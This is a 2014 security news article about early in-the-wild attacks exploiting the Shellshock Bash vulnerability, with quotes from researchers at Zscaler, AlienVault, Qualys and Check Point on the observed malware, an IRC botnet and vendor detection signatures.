DTX Manchester DTX Manchester
  • About Us
Friday, 22 January, 2021
IT Security Guru
CTX Manchester 2020 banner ad
  • Home
  • Features
  • Insight
  • Events
    • Women in Cyber 2020
    • Women in Cyber 2020 [SPONSORS]
  • Topics
    • Cloud Security
    • Cyber Crime
    • Cyber Warfare
    • Data Protection
    • DDoS
    • Hacking
    • Malware, Phishing and Ransomware
    • Mobile Security
    • Network Security
    • Regulation
    • Skills Gap
    • The Internet of Things
    • Threat Detection
    • AI and Machine Learning
    • Industrial Internet of Things
  • Multimedia
  • Product Reviews
  • About Us
No Result
View All Result
  • Home
  • Features
  • Insight
  • Events
    • Women in Cyber 2020
    • Women in Cyber 2020 [SPONSORS]
  • Topics
    • Cloud Security
    • Cyber Crime
    • Cyber Warfare
    • Data Protection
    • DDoS
    • Hacking
    • Malware, Phishing and Ransomware
    • Mobile Security
    • Network Security
    • Regulation
    • Skills Gap
    • The Internet of Things
    • Threat Detection
    • AI and Machine Learning
    • Industrial Internet of Things
  • Multimedia
  • Product Reviews
  • About Us
No Result
View All Result
IT Security Guru
No Result
View All Result

Shellshock-related attacks detected

by The Gurus
September 26, 2014
in Editor's News
Share on FacebookShare on Twitter

Within hours of the Shellshock/Bash vulnerability being disclosed, attacks targeting it in the wild to download additional malware were detected.
 
According to Zscaler’s ThreatLabZ research team, upon successful exploitation of the CVE-2014-6271 vulnerability, an attacker is able to download and install a malicious ELF binary on the target Linux system. The malware connects to a predetermined Command and Control server on a specific port and awaits further instructions from the attacker.
 
Other reports of attacks were spotted by other threat labs. According to AlienVault’s Jaime Blasco, it began running a new module in its honeypots upon notification of the flaw, and it observed “several hits” in the last 24 hours.
 
He said: “Most of them are systems trying to detect if the system is vulnerable and they simply send a ping command back to the attacker’s machine.” He also said that the honeypot received another interesting attack from a file with a PERL script that seems to be a repurposed IRC bot that connects to an IRC server and waits for commands.
 
Blasco said: “As soon as the infected machine connects to the IRC server (185.31.209.84) on port 443, it joins a channel on the IRC server. It seems there are 715 users (probably victims) connected to the server right now. As soon as new victims join the server, the attackers are executing the command “uname  -a” to determine the operating system that is running on the victim as well as “id” to check the current username. Since our honeypot joined the server, more than 20 new victims have become part of the botnet.”
 
Wolfgang Kandek, CTO of Qualys, said: “Our Web Application Firewall has the signatures needed to detect and block Shellshock attacks against websites. The detection is very reliable and is activated by default in the “normal” and “aggressive” settings on the WAF configuration page.
 
“Qualys scanners are considered not exploitable via the BASH vulnerability. Although Qualys scanners have a version of Bash vulnerable to CVE-2014-6271 installed, the scanner exposes no listening interfaces and services to the network, closing the common attack vectors discussed in the release of CVE-2014-6271. Further Bash is not used in any of the communication mechanisms that the scanner uses: scan dispatching, software updates and monitoring.  We will update Bash on the scanner in the next system update cycle.”
 
Check Point said in an update that it had released an IPS signature to protect customer environments. It said: “The signature enables organisations to add a layer of protection to their network during the time they need to update their systems with vendor provided patches. This protection will detect and block attempts to exploit this vulnerability.”

0 0 vote
Article Rating
FacebookTweetLinkedIn
Tags: AlienVaultBashShellshockThreatLabZVulnerabilityzscaler
ShareTweetShare
Previous Post

Veracode and Appthority in legal battle over patent use

Next Post

Next-generation firewalls must evolve to remain relevant

Subscribe
Notify of
guest
guest
0 Comments
Inline Feedbacks
View all comments
trackback
Heartbleed one year on - who is responsible for preventing another incident? - IT SECURITY GURU
April 8, 2015 12:09 pm

[…] that “on the scale of 1 to 10, this is an 11”.  Since then we had the Bashbug/Shellshock bug in September, while POODLE bit OpenSSL again in October. The announcement of “high severity” […]

0
trackback
Heartbleed: Who is responsible for preventing another incident? | ITProPortal.com
April 8, 2015 2:56 pm

[…] saying that “on the scale of 1 to 10, this is an 11.” Since then we had the Bashbug/Shellshock bug in September, while POODLE bit OpenSSL again in October. The announcement of “high severity” […]

0

Recent News

Instagram notification symbol in neon lights, with a white heart and a white 0 next to it

Social Media Fails to Monitor Extremist Content

January 21, 2021
The purpose of this image is to portray security through a key attached to what looks like a memory card.

Biden Administration to put Stronger Emphasis on Cyber Security

January 21, 2021
scrabble letters spelling out "Scam Alert"

Phishing Scam Exposes Stolen Passwords

January 21, 2021
Close up image of the sun/a star.

How did SolarWind Hackers evade Detection?

January 21, 2021

The IT Security Guru offers a daily news digest of all the best breaking IT security news stories first thing in the morning! Rather than you having to trawl through all the news feeds to find out what’s cooking, you can quickly get everything you need from this site!

Our Address: 10 London Mews, London, W2 1HY

Follow Us

© 2015 - 2019 IT Security Guru - Website Managed by Calm Logic

  • About Us
No Result
View All Result
  • Home
  • Features
  • Insight
  • Events
    • Women in Cyber 2020
    • Women in Cyber 2020 [SPONSORS]
  • Topics
    • Cloud Security
    • Cyber Crime
    • Cyber Warfare
    • Data Protection
    • DDoS
    • Hacking
    • Malware, Phishing and Ransomware
    • Mobile Security
    • Network Security
    • Regulation
    • Skills Gap
    • The Internet of Things
    • Threat Detection
    • AI and Machine Learning
    • Industrial Internet of Things
  • Multimedia
  • Product Reviews
  • About Us

© 2015 - 2019 IT Security Guru - Website Managed by Calm Logic

This site uses functional cookies and external scripts to improve your experience.

More information
wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply
Privacy Settings / PENDINGGDPR Compliance

Privacy Settings / PENDING

This site uses functional cookies and external scripts to improve your experience. Which cookies and scripts are used and how they impact your visit is specified on the left. You may change your settings at any time. Your choices will not impact your visit.

NOTE: These settings will only apply to the browser and device you are currently using.

GDPR Compliance

Accept